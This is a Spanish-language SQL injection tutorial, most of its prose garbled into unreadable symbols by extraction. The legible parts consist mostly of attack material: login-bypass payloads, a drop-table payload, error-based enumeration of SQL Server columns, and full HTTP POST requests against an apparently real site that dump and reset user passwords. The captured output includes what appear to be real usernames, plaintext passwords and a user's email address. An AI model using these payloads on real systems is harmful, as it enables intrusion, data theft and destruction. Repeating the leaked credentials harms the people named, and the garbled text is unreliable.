Tecnicas de SQL Injection by Richard Rivas

! #$%&

" ' " * +"

( ,# . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' "- " " 3 #$% 4 )

? @ B C

) 5 , ! ) %" " 5 " 67" * 8* " . 5 9 ", # :) * * #. 8< + " " ) >; ) 5 4 ' " ; 4 # ! 4 ! ', * #$% 4 : "' " ' " "A " * "+% "' ; " A " "' ) " 5. "

) " " " ! 6 . " #$% 4 + ;7

/ ; " =

" " " .> ", " " " 8< " "

" "

)4 " 7

# )

+ = ) & " +

. " ! . 7

& " "+

9 & "

" " . " ( "

D "

9 &

(

* 6

6 . " " 6 ( "" " 4 "" " 7< " ) "

" "

&" " "& "= . (( #

2 ;

" " "

* 5 "

. "

6 " .

" 6 "

)

" (

)

* 9

7 " 6 (& . 4 #$%& " " " "

" *

!% & ' 5 * " D C 2 . 6 " . ' " * 9 " " 9 ( " ) 4 & " * ) 4 " " % #8$ 8% * * & !

% . . = 4 " " " " +&

"& +

D "

" & .

) " "

( & "

" )4 "

) 4 ) 6 9 "

( ) "

+ 8 . " 6 7 " 6 " . "&

" &

" " ) " " 9 . 4 #$% " 6 E#+) " & : + " 51# CB@ + "

9 "

.& 9 +" " ")

)

" . 4 "& 9

" ") " " .

4 " . 4 + % . . > * 6 D C & #8$ 8% #$% E# $ + % . . F

" D " ,-

9 9

+ = *

<F #: * " " 6" .= . " . 4 4 " 6 " . 4 " " "

* CB " #$%BC + #$%C & " 6 "

" " 6

. " "

" "

(

" &

" " ) 6 "

>! #$%> " 9 4 " ) ) " 6 " " . " 4 " "= 9 " #$%2 . 6 "& 9 " + 6 6 " 6 . 4

( ) * # +, $ ( " " " " " ) " " " 9 - + " *& ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " "" F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51

3 5

) & ( ) "

"C & 9 " & ) 9 . ) " 6" 9 4 & " 9 " ) * " . = " 6 6 " # & ) " 6 " 2F " 9 " * 9 " ) :# 2 %

" ) 7

" 9 " ") "

) " " 9

8 ""

:# " 6 &

6 '

" 9

- " *

" "

, " " 6 "6 " " #$% @

& " "

. "

" "

" . "

" "& " "&

' *

" .

) = .

9 6 "& +

9 6 "

" "

" . )

#+) " :#

+ 9

" " 1;& + " * 0 " "

" * #$%& " * 9 ( " . CC? " "9 . ) "

#0#$%& ) 4 & " "

" 6 " #$% .

" " *

) -

6 " ) " 1;> H " D CC2

" &" " G

#+) "

" "

E#$%

6 "

. " "

)

) "

" 1;

67"

CCB . ) 9 9 " ) " - " 9 " . " " . " "

D CC = " * #$% # 6 3 * ( " "

) > ( =

& + 9 =

( ) . "9

. 6 , " G

" *

" )

7" " " &" * * "9 " *& 2 G " 1;

" . " 9 " " E! 9 ) 4 =

" * #$% " 6 " & " I) & " " ) . ( #$% # 6 & "6 ) " " & " " " " 6 4 "" & 9 " " " " 4 6 " " =" "

* 9 9 #$% # 6

& " " " "

" "" <

" *& * " "& " " " " .

+ ) "

? # ) 4 )6

") & *

" " ) =

+ " " #$% ) " & " " ) " " . 9 . & "9 " " & "9 & " ) " ) 4 " E' " " " " #0#$% # 6 & 9 "

) " ) 4

. &

J 6"

8 6

" )

& "

" .

" "

" . )4

" & "

6 &

. " " " #0#$%& " " "& 9

8 " >#5> + " 8 ) <

#$%

9 " #0#$% 9 " 9 "

5 E8" # 6 & 5

) "

+ ) "

. =

6 " " ""

9 (

) "

)

" " .

) " "

" I + ) 4

" & *

6 #0#$% # 6 & "" 6 " "

1 % )"

+ =

" "

"& ) = " 4 " " ) 4 "

" "

" )7 &

" E#51& 5 ; M& !N #!N& ;'!& ( 9 " 9 " " & " " " ;'! ! + 1 ! "

+ F

* 4 4

" "

"& .

) " ) "9

9 . " = & 9 (. " "6 4 " EIF " ) " " "&" 6 . "& " 4

"6 "

". " *

. " > > EKKF

" "

6 7

"& + " 6

"" "*

( 1 ( * $# #0#$% 6 L"& . " "

#0#$%

" #5 " " " < "

") " " "

)

; " "

" "

" & " 6 ;'! 332 .

" "

" 9 "

#0#$% .

)9 #0#$%

* 6 " 6 #$% E! 4 7 & " 6 "& "6 )

)

" "

= #5

" 9

> >F " "9 6

#$% )7

"& ;:,:#

" "

" D " " . "

" "

) "

" * " "

+ ( & ,#)) ; , 6 % * #$% # 6 > O#$% # 6 "* " - ** " " " > 8" 9 " " * 6 P

& ,!

" ) < " "6

" +"

" "

" " )

! " Q " Q " Q .

" "

" ) ** #$%& > M . 8< " G ) ** " ) " >" 6Q * EF>

Q M9 Q " Q < Q" "9 " Q"9 .

6= "

" ")

" < = > E #-1 B303B 022CB0@F )

< < < < < <

)

6 "& "

" "

# ) * " "

9 *

" #$% # 6

9 )

". *

>; ! * " " , ") 1: < " " + "

" "

" +

M . 8< " " 9

Q Q" Q " Q

" " 6

" < < < <

" 6)

-""" " Q " " Q " +

+ +

"" "

>& "

G (

% &

;

" " 6 " "

) & #$% " * " <" " " : & ; " 0#$% "& < " . " & " " " . " % & / 51; 8H:R8 ,81S

" "

" (

" " " " "

6 .

.# . & 6 " ) "& " = ) " = " " ) " . . * " "

* #!

.# . ." "

" "* . .

"6 " " ."

(

& ) " "

J *

* "

) "

" )

) "

" "

(

%! # #! (

A : G 8 8

( (

/ : ! -S 5H 1/ : ,8 -S

& .

(

. 6

.# .

+ )

" *

(

,8%8;8

+ (

!,5;8

%! # #! % " " " "

)

1#8 ;

5 " E!%0#$%

" *F "

( +

" " "

( 8

5%;8

#8%8';

( ( (

% & ' 85;8 , :!

% &

. 4

( (

" " * " ." "9 " . " < "

) " ."

" 6

" " "9 ) " 6 " " ." "" " " =* " 9 ) " "* . " ." "" " " *

B 3

% &

T U TU TV UV V -8;G881 % R8 1

+ ,"

. . 9

+ (

. *

9 9 9 9 6

( (

) "

4 & !

SELECT * FROM Tabla; E8" " 6 6

) >; ) >F

UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 4 "

)

& " "

" "

. 4 #$%& "

" ! 4

# )

6 "

" #$% "

" =

& " " "

" " ""

" 4

" "

#$% &

. * " ) &

& 7

9 "

+ 4

" *

& " " 6 " 9

+ .

" 9

"5 # #

67 " H ) ")

" 9 = " &

(

" '

. 8 &

>& "

" "

9 "& " . " >5 9 " 9 * 6 & " "9 " #$% ) "& "

C "

" )

" " =

# )

" ) " . * " * " " "6 " " " ") " " " " 6

9 .

" *

" "

" !

. 4 "

. 4 . " )4 6

" &+ " "

" ) 4 *

( 6! # ) ) "

9 8" " 4 #$%&

5 +

>#$% #0#$%&

" * "

"".

" " 8 "

" =

* .

9 . )4 6

" "9

)

" "

J "

9 <

(

" "

&) 4

" .

" "

# ! 6 . " #$%

" " " 7 .J

. &

)

. "

0 8* " 05 9 ", # 0 :) * 0 8< + 0' " ; ,

J #

9 " " !

" "& & " 6" <

)

9 "

" 6 +

9 )

". * " 6 "9

9 . " &.

" "*

" ) " " "9 6 "

+ "" ) " " " " 6 " )

4! $ (! & 9 " " 6 .= " " "

)

" "G " "

" 5#!

=" " 9 &* " <

" " " 6 " < " * "& " ". * " " =* * # 6 " ) " " " #0 G " 9 *

" ( " 7<

" "

+ 6 "9

( " 8"

= "

"9 "

)

" 9

" )

6" "

) " &

" " * " D

:M& " " " " " "+ 8

)

&" " 6

)

) 6 (

& "

6 )& " ) "

" 6

" 9 "

" : % * " ) "

+ = ) " " "

. .

6 "

" * 9 " " "

" &

" "& " )

" )& " 6 "& + " ) . " "

)

) M. " *

* *

" 6

"" "

" "

)7 ;

)

+ =

6 6

" ) ) 4 "

(

" 6"

) " "

" "

* .

) "

<FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8"

* . 9 +

" J .

" " "

" . " "

. &) " " 6 " " 5#! " " F 8 + 6

" "

& (

. " " . 5#! ) " " E! * ; %& 9 ) " "& . ; % + 6 6 & * &

)

" . " " * 6 + . "=

< * ) )

select * from users where username = _UserName and password = _Password 5 * "

)

" "

" 6 " 6 6

" " "

" .

" "II )

& " 4

( " &

" "= + "

" . &" .

& "

) )

" "

" %

) "

" "

http://www.objetivo.com/libreria.asp?edicion='Noviembre' !

" " & " " " " ) + ) " " L1 6 ) L " " " " ) 4 . "* " " "

% 9 "

= +

)

.= EN,F )7 " " 6 . 5#! 9 8 " " & + ) ) . ) " " " . 9 * 6 " 6 . "

select * from numeros_anteriores where edicion = 'Noviembre' " #$% > "

9 =

>& .

) " " "

9 . & "

" "* " " "

" *

) 7

" "

+ " + "

9 +

) "

#$% 5

& E'

" " " F

) "

" " !

% L E'

4 &" +

9 " )

* +

F " "& "

"" " "

) 4

" " )

L "

") +

" * #$% # 6 " "

* 6 9

9 6

"" "

)

#$% 9

* "

(

4 (

" 4 &

(

" .

" "

= .

" " + &

" )

Usuario : An'gel Password : 338xD

select * from users where username = 'An'gel' and password = '338xD'

select * from numeros_anteriores where edicion = 'N'oviembre' 8

) "

" " 9 " #$% # 6 & " 9 . "

" " .

" "" &

" (

" 9

username = 'An' edicion = 'N' % . & ". "& " " 5

)

9 "

"" 8

9 "

#$%& * "

" = "

" 67"

" 4 "

" +

. " 4 " 9 9 " #$% # 6

( & & ". *

" L5 L + L1L II

9 .

"6" ) " "+ " " * " " (

9 6

" "

6 "

%& " " " & (

* "

)

"& .

" 8" " " ) " 8 "

* " +

" ") " " " "

6 & 6 6

. ) =

& 9 " " )7 " ". 9 " 7 " " # 6 " . #$% ( ( 6 ) " E84 "

)4 .

" .

& " 6 9 " " " + ) 4 " " " . & " 6 "& " * " 9

" " &

) )

" )"

" "

. " . "

.J .

& 7<

) " & < " 4 9

)7 & "

" 6 " " " ? >8 # 6 >F "6 " 9 + #$% " 6 ) " " 9 "& 9 ) " " ) 4 + " ( " ' " ' & " ) 4 > . #$% > EH B * " + " "F 9 " " * . ". " <

2 1

% &

' +! 0

(#)* ,

% ,

123 % & ) "

& ) + " (

" * " I

"" "

) " " + =

" &

"9 ""

"" . )4 6 6 6

" "

!8 ( . " 7 " #$% 4 . " 9 " " "& 9 ; %& 5#!& & " " " 6 ( 9 # 6 ' " 9 " ) "& 6 ) & " & 4 & . & 6 " "* "

)

& " > 6 * "6 & " " . 9 & 4 & ) "= 8 " *

" & ) " "

) . " * .

. >.

. >F

" > )

"& " "& + "9 .J ) " E! " ." > >% " ' ">

) " "

" "

" " "

)

;:,5 * " " 6 (

" (

&" .

" =

& "

. .

" "

)

" " " " "

" " "

9 7

= "

" "6 " ) " " * " *

" ) 6

& "=

" " "

. "

" + =

" . " 7

6 " # ) & 1: ) ) " " & "6 " " ) E8" " " ) 6 "+ . F

+ =

) . "

" . " " " < #$% "& .J " " + ) 4 * " EH > % " ' ">F

" >

& "

6 " " 9 )7

"> " )

) " "

6 "

6= "> "

* *

" "& +J

" & .

. " = ) " 9 "

3 $

" "

" " * " 6"

" H 7 " " ! " * =

. "&

" .

#$% ""

" . I) & E> L >F * " ) 6 "

+ "

(! "

.J "

" "

"6" + " 9

" " " " " ; % 5#!& * " " " " 9 6 "9 " " " 6 "& . " # 5 : + !5##G: , " " . 5#! 9 ) " + 6 #$% ; ) 7 = " 9 * " " 6 #$% " <"" . " " " 4 "

" 6

+ = ) *

) & 3( " & # " : 0% & " " "+ " .= & ! . " " " D " 9 6" + ) " < " "+* " " " " & 9 4 4 4 ) " . " 4 " " " " " "" " " ) "& 9 " "& " . " " 6" * . 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " "

" *

" .

! 6

" "

. *= " "

" "& : 0%

$ ! . 86 , * " "

" ) &

* .

)

. *=

---- Extracto ------------------------------------------<FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"

size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------!

9 .

* 5#! E! "9

) &" 9 6 " " " " ) .

( "

" & ) 4

& " F

. " (

; % . " " & " " " " "

" 9

* +

#$% " 6 "6"

"& +

" "& "

)

select * from users where username = 'Angel' and password = '338xD' !

) " (

" "9

+ (

)

<" 6

9 =

6 ) )

* "

)

4 =

#$%

" " D

" I :M& " + 'or 1=1â&#x20AC;&#x201D;

" 6

" .

Usuario : 'or 1=1-! "" L V W A 47

"& .

)

select * from users where username = ' or 1=1-- and password = ' or 1=1--

@ 1

"" .

(

" 6 6 + =

" "

" "6

E ""

>: > 9 " " ) . " "

& F&

, 0

Usuario : 'OR''=' Password : 'OR''=' 5 4/ '

) " > "

# )

" ">& " #$% "& . +

" (

" .

+ &

(

#. "" +

" 6 .

" 4

)4 .

" & "

& "

6 + > 00 > E, ) & #$% 9 .

" "

6 &

.J "

& "

)

6 " &

6 4 . F " " " 9 6 .

" 6" "

" " " *

" . " >5

9 >

<" > "

Usuario : Admin'-Password : 'or 1=1-8

= &

" "

select * from users where username = 'Admin'-- and password = ' or 1=1-# . 8 E' 6

"= + " .

"6"

" 9

4 ) 6

F "

" +

) )

" " ">L> " + > 00 > E, ) / F " < "& " )

" > " "

"> "

) 4) 5 " #$% 6 . " " "

' *

+ =

$ 7! . " + " )

" " . "

"& 9 6

" * "

) 4 " " 9 6

" *

" 6 .

. "" 5 6

" >

9 " < +

" " . ""

" 6 "

) " 9 D

( ) * "

) )

" "

< "

" ) 9 " .9

) ) "& "

. ". *

1 "

) " 6 " )4 ) "

" )4 "

8 ". * 6" "

% # #$% # 6 & + " & " 6 . " " 6 & " > " & " ) +> > " " ) " " #$% # 6 "

" " "

" "9 "

) "

> 9 " + *. " " " " E' + < " F& " " " " " " " . & . 9 " " ) " " "& + " 9 " " & 4 & " 6 " " " " " 6 " " " & " 6 " 4 & " + * " " ) " < 6 . & " " " . "

' ; "" 6 ##$%#8 H8 < >< Q ) "

"* . & " * "

$ 7! .

)

" " 17 !

& ) 4

! "

" " * "& + " *

) " " 8 4 .J " " "& " " " ) "+

B . 6 9# + & % " 9 " , . # 6 & " 6" " " " " E8 " " ) " = "& 4 " ( + ( & F 5 9

* 6 9

6 " &6 9 4

" " ) "

"9 .J 4

" & . " " 6

. & +

M #$%& "

&" " " D " " E' = " 5 9 " 9 " . " " 6

& "

= 8

. "

"6" " . 6 9 J " " "

) & "

& F

& * " 9

* &

Usuario : '; drop table usuarios-Password : # *

) )

) &

' 6 "

* >8*

.J &

9 7

> "

" "> "

! 6 &

+ ) ( , # " " ) "&

" "

" &

)

. " >F & "

. " 9

" 9

" 5"= +

6 "

(

. ) = "

+ 1

67 )

: 3( ! ) ) 7 "

) & #$%

(

4 " D

# )

" " .

& 4/ .

! #& " * " " " " ( & " " ") " 9 ) " :,-' :%8 ,4 " #$% # 6 . "

9 &

& " " "E ) "6 & +

" "9 "& "

) . " ) " " ) "

. 7< "

& ( = & 9

C "9 1

) "

& "

) "

! " "

" " D

6 6") " . "

&" " &+

" 4 " " " +

6 ("

+* "

.1)

8 6

* " " " 6 (

". > L > E' *

" "

4 #

" &

F "

& 6

)

" " .

Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login='\'') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. -

:)6 %

E 2 ! 3 8 ? . 1

" <

" * #$% < ) " " " > )Q ) >F " * )Q ) & ) ) " " ( " " " "> . >

& "

:,-'

" 9 "

6 + :,-' 8

" )Q

" "

" "> " .

> *

)

3 % ) 010.8#* - "3.9$ (")-#)

123

:;<<

----- Fragmento ----------------------------------------<?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class var var var var var var var var var

DB_Sql { $Host = ""; $Database = ""; $User = ""; $Password = ""; $UseODBCCursor = 0; $Link_ID $Query_ID $Record $Row

var $Errno var $Error

= = = =

0; 0; array(); 0;

= 0; = "";

----- Fragmento ----------------------------------------6

" . &" *

* A * " )Q )

" " " >" " > " 6 ) " X " + X! "" " 9 " ( " " " . " "6 & . " 6 4 * . 9 & " "& 9 * 9 9 6 " " + 6 & " " . " " . " " < 9 " " ) E8 " " F

: ) & * / :M& 6 " " * 6 " "& * + " " " + . & " 9 4 .

" " "

#$%& 6 " " 6 " ) "

" "

! 9

#$% ) "

)

9 " "

4 )

" ) "

" . "

* "

" "

(

6 "

" #$%

" 4

" &

(

" ! " 9 6 4 6 " " ) " ) " " #

"6 " "&

" &

" " ) < 9

( 6

" "

9 "

B "

* "

7 " 9 D " <

" 9 " 6 " " " ;;! " )4 6 & " 6 " < & & ". *

"' "+% ) 4

9 7

< ""

" " " " 6

% E8 "' ".

. " 9 " ;;!

M "F& E5 . . =

6 " "&

6 & " *

" (

nc -vv www.objetivo.com 80 < sentencias.txt ' '

" &

(

9 )

" "

8" *

+ " * " ** * F& . " D " *

" " ;;! * E8 " " * # +1 & " . " ) )4 6 . " " E5 . ) " " " F& " 6

" "

>! ""

Y Y H * -

& "

! " " " *

( * 8 "

. "

"" <

6 "

" " + & 6 6 " ) " ! " "

* 9

" 7 ) 4

!:#; ) <&

. " .

+ )

" ) > L > E'

9 "

(

" F &

* " 6 "

) "

" " E 6 .& .

6 "" ( > " > "> #$%& " * 6 9 #$% E 4 :%8 ,-F ) " " " 6 " " " "

H 6 ( "

> " .

" . " ** ) " 9 )

" 4 !:#; 9

> " " " < "

6 6 " )" 6 6 (

" )+&

)

" #$% 9

" ' " " " * " 9 < & " 4 "& " 4 " * 6 " " "

" 6=

* (

2 1

. $

)*1( 5*'>

! "

) "

) " "

% ) 9 6

"". " " ">

" " " "

6 ! \ ]

5 ! [ 0 ^ Q 9 6=

" 6 " "

(

& +6

( 9 "

)

Z 0 Z?' Q

<& " " 9 " "

9 " ;;! "

Z Z2Z25 [ Z Z2, Z ' Z B Z C Z28 Z2'

" - M# " "

9 "

= "

!:#;& "

+ ' # ! +' , "! " 8" #. . ' ! 7 "" ! 7 "" +

OO V & E F U T

:MK

6 ""

" " "

( 6

6= " &+ 6

" " " )

nc -vv www.objetivo.com 80 < Injection.txt > result.html -

) !

" "

* " H

9 6"

" "

9 4

" *

& "

"" "

" "

+ "

" " * "

> 6 .>& " & "

7 )

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! *

KK " " " 4 " ) ) " E # 5 :#F& "=

5 "

9 6 6 " "& "

6 " )7

" 9

& &

" =

:,-' (

) *

) & " * < + ( " " " " " 6 !:#;

" )" 6 9 #$% # 6 " 6 6 * " " . " E " ,F

" "

) . = & * " # 5 :#

)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select

list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " 6 ( +

" "

)

" > . " > > 6 >

" 9 " # 5 :#&

.= & "

" 9 " )

>. "

)+> "

" # 5 :# " "& " + 8" " =

> 6 .>

" ) ,

) * "

(

"+ "

'group by usuarios.UserID,usuarios.UID having 1=1-#!

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 *

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1â&#x20AC;&#x201D; #!

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85

'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-#!

HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M "

9 =&

" )" 6 " + ) ". > " "8 > 8 9 " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ "1 F A=4 " 9 " " !:#; ;;! 1: " &" 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6

+ E8" " L. 6 . V 00F , *

)+ & " "

) 9

" "

,& "

9 " " " "

,& " &

" "

" " " "

( '

" "

) & " *

"8 "

) &

" " "" . " 9 ;:,:# " " #8%8'; . & " "& " " #8%8'; " + 9 * " II 6 " 4 < " # " " .

SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y

( ) = " ) = . * "+ )

7 "

" "

E8" " >& > <" > ?> E, * " >#8%8'; _ A : ` a> " " " " 7 F " ( . " " ) "

>. )+> + > 6 .>F " > + > 2>& " 9 " ="&" * ) " " " " "

POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" ") V) VL " "L )+ " F )+ 00 > ">

" ) " "

" III H "& ( " + = 9 " " # * " ( " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " "" #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "

B 4

;:!& " " ;:! F

;:,:# 6

!:#; %

" 9

. )4

) )

" &

Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -7

" E! >F

" > !

" "

+J ")

. (

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) # 5 :# " > " # )!% #, > % . 6 ". ;:! + " . ) "+ " :-

5 ".

)

& 6

"& "

) "

& "

&+ " &

) " " & >#

9 )7 " " " % . " D *

" "

* "

+ " 6 (

9 " " ) " ) + " " 9 " #$% > 1 :1>&

" 6

. " " EF> "

# ) " 1 :1 " " " " >) " "> . 4 #$%& " 9 " J " * "& " ) J 6 " ) " " ! 4 & " 1 :1& " " " > " " " " " ) " " !

EF&

" )

* "

J >&

) .

C 5

9 (

" "4

;

) " &

" ".

" .

" "

" 6 "

< +

" +

"& . !:#; " <

6 ".

" " 6

" = 6 & )

1 "

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 )

" " & 9

" I8 , ) )

" " ,> 9 " " 6

E> "

(

" "

& " " "

9 6 "

4 4 " " "

F 1:& " 9 =

6 :,-' " " ) 9 ( "

" " " "

) & "=

)

2 "

" 6 " #$% ) " #$%KK&

" 8 "

"& "

" " )

# "

)

) " E! "

+ ) " "9 ".

. " "" "& " . #$% ! . * & )" 6 1 &( ! # 5 :#

6 " D " " 6 , " . ) "

&" * "& "

" " " " #$% 1 :1& 9 " " " ( & ; !: ,8 ,5;: 9 " "

9 " #$% "

* "

9 " < =" ># > & #$% " " " " 4

" < "

" " " " " " " " 8

I #$%

" +

" 9 1H5 ' 5 " " ) "

" " ! <1 " " ! M " " %"# " " " , " " , M " , E1 ) " " # " !G# E' " D F

" + " " " < " ! & " > > . > " E! .J & " " "& " " ) " " ) " ) " " 6" " > >& 9 ;:,5 * " )4 6 & b 1;5 ) +8 > . " , & " & 9 F . . "

. ) 6

EA 7

" + >5 6 6

" 1H5 ' 5 " >9 4 > #

" 6"

4 # # " " " # )!% #, " " " ." , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " '

(

. -

" 4 " F

. &9 " < ' " 5 + ` a>& #$% & 6 " " " " 4 " 9 " " " " 4 " * > ,>

IIF

! :M& 4 * *

( " ) "& . "

" + "

" " > . F 9 " " 9 " . " " ) "& + " " * >86 "& " "" " 4 E% " 9 9 " +

2 4; ! 6 ( " " " )4

* " 6 &

!< #$%&

(! (

(

>) 6

) " " 7

" 9

)

(! , 8 .= . "& . & " "9 " " A=4 " 9 * 4 . " " "" ( 7 " " "

> $6 3 / % #$% " * H 6

. ." " 6 !:#;

* )

) . "

" " "

) " ) 6

" * &

(! 6#; ! " ) " E% 9

" 6

" " " * "6

6 " "

& " ( * 1;: 9 " . " 6" ( F * " " , + !G# F+6

) =

POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y

2 H

+ <V W

L [L L[

-> $6 3 , 8

<6 "[L]L*

6 ( " #8%8';

EB "

<VLL " U <"

< "

(! 6#; !

)

(

) "

( " *

"L " )

!:#; " 4 *

<& & & * *

& " "

6 *

:,-' 6 6 .) "

" "

Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;

carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! &

6 ( ) ( , :!&

" " "

(! 6#; ! ") " &

) " . 4

! "

" 6 " " "& 9

" ") ." "

" " (

6 6

" . ) "9

&" " .

" 5 " "

"9 ) "

" "

" " """ "& * & " " " . .

$+6 4 H

" "" !,5;8

9 "

" .

" ""

!:#; +

( "

POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " "" "VL1 6 ! ""L VL' L00 +4 4 4 #

+ 9

" E5 9 ."

9 "

